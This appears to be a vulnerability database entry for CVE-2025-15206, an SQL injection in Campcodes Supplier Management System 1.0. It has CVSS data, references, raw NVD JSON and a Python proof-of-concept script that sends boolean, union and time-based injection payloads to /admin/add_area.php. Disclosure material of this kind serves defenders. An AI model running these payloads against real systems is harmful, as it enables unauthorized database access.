CVE-2025-15206

Description

A flaw has been found in Campcodes Supplier Management System 1.0. This impacts an unknown function of the file /admin/add_area.php. Executing a manipulation of the argument txtAreaCode can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:campcodes:supplier_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Campcodes Supplier Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15206 PoC - Campcodes Supplier Management System SQL Injection
# Target: /admin/add_area.php
# Parameter: txtAreaCode

def exploit_sql_injection(target_url, payload):
    """
    Exploit SQL injection vulnerability in txtAreaCode parameter
    """
    # Construct the vulnerable endpoint
    endpoint = f"{target_url}/admin/add_area.php"
    
    # Prepare POST data with SQL injection payload
    data = {
        'txtAreaCode': payload,
        'btnSubmit': 'Save'
    }
    
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15206.py <target_url>")
        print("Example: python cve-2025-15206.py http://victim.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    print("[*] CVE-2025-15206 SQL Injection PoC")
    print(f"[*] Target: {target}")
    print("[*] Testing basic SQL injection...")
    
    # Test payloads
    payloads = [
        "' OR '1'='1",  # Basic boolean-based injection
        "1' UNION SELECT NULL--",  # Union-based injection
        "1' AND SLEEP(5)--",  # Time-based blind injection
        "1' AND 1=1--",  # Boolean test true
        "1' AND 1=2--",  # Boolean test false
    ]
    
    for i, payload in enumerate(payloads, 1):
        print(f"\n[*] Test {i}: {payload}")
        result = exploit_sql_injection(target, payload)
        if "Error" not in result:
            print(f"[+] Payload sent successfully")
            print(f"[+] Response length: {len(result)} bytes")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15206
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15206
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15206/
[4] VulDB https://vuldb.com/cve/CVE-2025-15206
[5] https://github.com/IMZGforever/CVEs/issues/5
[6] https://vuldb.com/?ctiid.338579
[7] https://vuldb.com/?id.338579
[8] https://vuldb.com/?submit.723951
[9] https://www.campcodes.com/
[10] https://github.com/IMZGforever/CVEs/issues/5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15206", "sourceIdentifier": "[email protected]", "published": "2025-12-29T22:15:42.507", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Campcodes Supplier Management System 1.0. This impacts an unknown function of the file /admin/add_area.php. Executing a manipulation of the argument txtAreaCode can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:campcodes:supplier_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "836654A6-0614-4B2F-A556-E005AF4C7DE1"}]}]}], "references": [{"url": "https://github.com/IMZGforever/CVEs/issues/5", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338579", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338579", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.723951", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.campcodes.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/IMZGforever/CVEs/issues/5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}